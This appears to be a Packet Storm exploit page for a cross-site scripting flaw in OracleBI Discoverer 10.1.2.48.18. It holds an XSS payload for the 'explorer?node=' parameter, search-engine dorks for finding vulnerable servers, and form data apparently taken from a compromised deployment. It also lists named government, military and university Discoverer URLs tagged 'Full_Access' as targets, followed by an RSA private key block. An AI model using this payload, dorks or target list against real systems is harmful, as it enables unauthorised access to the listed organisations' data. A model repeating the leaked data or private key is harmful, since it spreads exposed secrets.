exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

OracleBI Discoverer 10.1.2.48.18 Cross Site Scripting

OracleBI Discoverer 10.1.2.48.18 Cross Site Scripting
Posted Dec 12, 2012
Authored by Ur0b0r0x

OracleBI Discoverer version 10.1.2.48.18 suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.

tags | exploit, xss
SHA-256 | c58ffd83bc1d7695546e8dcb6e1cb866aa14898088f3a34b7212334f210fd971

OracleBI Discoverer 10.1.2.48.18 Cross Site Scripting

Change Mirror Download
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# Author: Ur0b0r0x
# Tiwtte: @Ur0b0r0x
# Email: ur0b0r0x_@live.com
# Line: GreyHat
# Home: ur0b0r0x.blogspot.com


# Exploit Title: OracleBI Discoverer Ver 10.1.2.48.18 - Full Acces Data Base - Cross Site Scripting
# dork1:inurl:discoverer/viewer?
# dork2:inurl:/discoverer/app/connection
# dork3:inurl:/discoverer/app/econnection
# dork4:inurl:/discoverer/app/
# dork5:inurl:/discoverer/app/explorer"
# Date: 12/12/2012
# Author: Ur0b0r0x
# Url Vendor: http://www.oracle.com/technetwork/developer-tools/discoverer/overview/index.html
# Vendor Name: Oracle
# Tested On: Backtrack R3 / Linux Mint
# Type: php

------------------- Agreement --------------------
[08/12/2012] - Vulnerability discovered
[11/12/2012] - Vendor notified Dont responsed
[12/12/2012] - Public disclosure
--------------------------------------------------

#Proof Concept
http://ur0b0r0x.blogspot.com/

#Code/Xss/Path
explorer?node="><img src="x" onerror="alert('XSS')" />

#Code/Active contracts by Opdiv,office code,completion date - Active Contracts
<form action="/discoverer/app/parameters" method="POST" style="margin:0px" name="parametersForm" id="parametersForm"><span id="params"><table cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td><span class="x0">Select values for the following parameters.</span></td></tr><tr><td><table cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td><span class="xc">*</span><img width="4" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td><span class="x2o">Indicates required field</span></td></tr></tbody></table></td></tr><tr><td><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td></tr><tr><td><table width="100%" cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><span class="x8"><span class="xc" title="Required">*</span>&nbsp;<label for="_12">Please select the contract status IN</label></span></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><table cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td><input type="text" value="'A'" size="30" name="_12" onkeypress="return _submitOnEnter(event, 'parametersForm');" class="x4" id="_12"><img width="8" height="1" alt="" src="/discoverer/cabo/images/t.gif"><a href="#" onclick="var f=document.parametersForm;_submitPartialChange('parametersForm',0,{source:'params',event:'bi_lo_frm_sb',bi_lovID:'_12', partialTargets:'paramsscriptId'});return false;"><img width="24" height="24" border="0" align="absmiddle" alt="Go initiate search" title="Go initiate search" src="/discoverer/cabo/images/cache/clovi.gif"></a></td><td><script language="javascript">function biCallbackparametersForm_12(lovwin){ _setFieldValue(document.parametersForm,"_12",lovwin.top.myDataValue);return false;}</script></td><td><script src="/discoverer/cabo/jsLibs/BIParametersLOV.js" language="javascript"></script></td></tr></tbody></table></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><span class="x2o">Please select the contract status IN</span></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><span class="x8"><span class="xc" title="Required">*</span>&nbsp;<label for="_14">Please select Office Code IN</label></span></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><table cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td><input type="text" value="'00102'" size="30" name="_14" class="x4" id="_14"><img width="8" height="1" alt="" src="/discoverer/cabo/images/t.gif"><a href="#" onclick="var f=document.parametersForm;_submitPartialChange('parametersForm',0,{source:'params',event:'bi_lo_frm_sb',bi_lovID:'_14', partialTargets:'paramsscriptId'});return false;"><img width="24" height="24" border="0" align="absmiddle" alt="Go initiate search" title="Go initiate search" src="/discoverer/cabo/images/cache/clovi.gif"></a></td><td><script language="javascript">function biCallbackparametersForm_14(lovwin){ _setFieldValue(document.parametersForm,"_14",lovwin.top.myDataValue);return false;}</script></td></tr></tbody></table></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><span class="x2o">Please select Office Code IN</span></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><span class="x8"><span class="xc" title="Required">*</span>&nbsp;<label for="_16">Please select Completion Date prior to</label></span></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><input type="text" value="'01-JUN-2007'" size="30" name="_16" class="x4" id="_16"></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><span class="x2o">Date Format 'DD-MON-YYYY' (Example: 12-DEC-2012)</span></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><span class="x8"><span class="xc" title="Required">*</span>&nbsp;<label for="_18">Please select component code IN</label></span></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><table cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td><input type="text" value="'IHS'" size="30" name="_18" class="x4" id="_18"><img width="8" height="1" alt="" src="/discoverer/cabo/images/t.gif"><a href="#" onclick="var f=document.parametersForm;_submitPartialChange('parametersForm',0,{source:'params',event:'bi_lo_frm_sb',bi_lovID:'_18', partialTargets:'paramsscriptId'});return false;"><img width="24" height="24" border="0" align="absmiddle" alt="Go initiate search" title="Go initiate search" src="/discoverer/cabo/images/cache/clovi.gif"></a></td><td><script language="javascript">function biCallbackparametersForm_18(lovwin){ _setFieldValue(document.parametersForm,"_18",lovwin.top.myDataValue);return false;}</script></td></tr></tbody></table></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><span class="x2o">Please select component code IN</span></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td></tr></tbody></table></td></tr></tbody></table><script language="javascript">function paramsbi_selectParams() {var f=document.parametersForm;submitForm('parametersForm',1,{event:'bi_selectParams',source:'params',bi_cPath:'params'});}</script><input type="hidden" name="bi_viewNames" value="params"></span><span id="paramsscriptId"></span><a onclick="paramsbi_selectParams();" accesskey="o" href="#"><img width="35" height="18" border="0" align="middle" alt="Go" title="Go" src="/discoverer/cabo/images/cache/en/bGoGl9n.gif"></a><input type="hidden" name="stateStr" value="eNqNU11v2jAU/TMh2mS1ssNH24c8IGDapg0mtX2OHNspAScOtokDv37XCaURtN0eyLUv5577ca4DtzVrGwyiEa8TbsAOoslOmqQZRORhMJzPc8NULbTQD/ntk7JUopnal7YHG13CZqqoVClKC1AuAGmNSYCb4Evks7R5Qa1APkQKm6sSzeE$iGZyDZ9S6YJKOGRUGs$0q5KZKq2mzCJjqd0b9IdqWggrNAF2$E2zLPNm2q$RXGZeaS40Wu4LtHwBHFUOEOcsp6i79wcwdVRzH6R3/aAqWWVZzkTb9btljcFgTHDUL214VdobS0d7nhJ7mxL3d6t6LXuLyc3P5$VNhPFdP8X9ZYq5kpJqg1apzF$AiffAkys591p3Yl5oNMkKwDYFCDQxxsDZ6n1/fuP/1/u8I$R6m056v4r12Wq8Lh77SAKY9vTH98f$dPA/M56h0YfQx3YZAcq5gT/bhP5RwafZ3pBCIvAa6PfoyC12aHtoeI1SenRwYeboorE7NBVDNQDc5tBseH2AYAfSjE4tjiRrHyjQ2vRTYpsemjQ30nrD1sqztqQn56aFAEXlR2TW3cMfudofCMFd7a07YGUQ1szGpuYhK7cxyxIKiIBWgW83g1bBys6YzpSss9y7A9FUMghNFYclyBKTUNSgUQxuWvLQP2MRf7kffg21UjbGoUttHAWVznmw$LX4vVg$wSZF3wgOmD1UQZ0LJ/RfFGiQmw=="><span id="_parametersForm_Postscript"><input type="hidden" name="source"><input type="hidden" name="event"><input type="hidden" name="bi_lovID"><input type="hidden" name="partial"><input type="hidden" name="partialTargets"><input type="hidden" name="bi_cPath"><script>var _resetparametersFormNames=["source","event","bi_lovID","partial","partialTargets","bi_cPath"];</script><script>var _parametersForm_Validations=['_isEmpty(%value%)'];function _parametersFormValidater(form){var fl = _multiValidate(form,[0,"_12",0,0,0,"_14",0,0,0,"_16",0,0,0,"_18",0,0]);if(fl.length>0){_validationAlert('Form validation failures:'+fl);return false;}else{return true;}}var _parametersForm_Labels={'_12':'Please select the contract status IN','_14':'Please select Office Code IN','_16':'Please select Completion Date prior to','_18':'Please select component code IN'};var _parametersForm_Formats=['A value must be entered for "%label%".'];function _submitOnEnter(e,frm){return (_getKC(e)!=13);}</script></span><script>_submitFormCheck();</script></form>


Sample/Demo/Full_Access/
http://dcis04.psc.gov/discoverer/app/econnection
http://abac.upf.edu/discoverer/app/econnection
http://mytest.sfwmd.gov/discoverer/app/econnection
http://demoa.ocu.es/discoverer/app/econnection
http://www.paaf.gov.kw/discoverer/viewer
http://www.qix.gov.qa/discoverer/app/econnection
http://discoverer.banrep.gov.co/discoverer/app/econnection
http://statistik.forsakringskassan.se/discoverer/app/econnection
https://oasext.epa.gov/discoverer/app/econnection
http://www.reeis.usda.gov/discoverer/app/connection
http://cbi.superfinanciera.gov.co/discoverer/app/econnection
http://mytest.sfwmd.gov/discoverer/app/econnection
http://owl.cuny.edu:7778/discoverer/app/econnection
http://oaspruebas.policia.gov.co:7778/discoverer/app/connection?event=displayConnections
http://siadapp.dmdc.osd.mil/discoverer/viewer
http://xportalt.sfwmd.gov/discoverer/app/connection
http://siadapp.dmdc.osd.mil/discoverer/viewer
http://www.cdr.isa.org.jm/discoverer/app/econnection
http://suamox03.dane.gov.co:7778/discoverer/app/econnection
http://iaorap1.mincetur.gob.pe:7778/discoverer/viewer
http://discoverer.dnr.state.la.us/discoverer/app/connection
http://www.moi.go.th/discoverer/app/econnection
http://www.reeis.usda.gov/discoverer/app/econnection
http://www.st.nmfs.noaa.gov/discoverer/app/connection
http://portal.nysed.gov/discoverer/app/connection
http://190.242.99.238/discoverer/app/econnection



-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQD995aYvrD2mK2fwwQr3FoAAprFLfMAiwR8cQUZW2XWDUSNJdvl
Mq/1qym16+Yx7AVmXbsdCzqV/zeX+VUg6fUUWFwzNru6akjOlEHnSpNPxfJaCOEi
2AFovRie8LJyXtmXf1VFVU7l33/OBUsGJAUa2H4bR8ChTUffSHqkoFLE5wIDAQAB
AoGBANJgFc/RpqWfM7Pzx7DNh4AaqDpOJc19Wun6dU7b9y+pLe/+PHlP05Kdhp+8
GaOg75gsbKNSeeVm1JZ/Y5UwOGJLn06W8PaBgkNG+b6tv9iRV7jSubEscwfGOXSX
X5Hi9XP02MOrEsqOcgl6Xqpf8//fauhem8a4/iftk2hG3ngBAkEA/4C5QQePSOz/
WyypDfUC5Nr5h32zq5bvRY++v7ydzeSRQD8uri66zZuz0gGTzjGdyBUb2OuTDT4R
8RUcW1x9QQJBAP52GYGDg/+EE7ABX4zT/ZOHJScjlezxbwLiTsvWoESRUrQftLOL
Wvl2IpeYpWvKIjTzyb5WH+IBWPFpM6RfsCcCQQDnqrDOrOsXhYSYB+uVMyYXmhEM
8EYb/HQhj4+2THCNQoUNSvyphMduLJKkhTeei1B0HeetDRS9uh0Mika29CrBAkAM
BVg/Hg9mSr8DWY1CAeHAzmma57t1bhJoeHhweLspghP+HmFS+gpaLpKDxtpJtUrY
ZYvqSfdHnfitruKZqUuRAkAti8p7b53+cFSm14WPNtdhJQnxniUcSKBtNm5ExO7J
X54eZI4iddc9xnP4rySfwz933FhMRF9Eh3gPUYAPBpp/
-----END RSA PRIVATE KEY-----
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close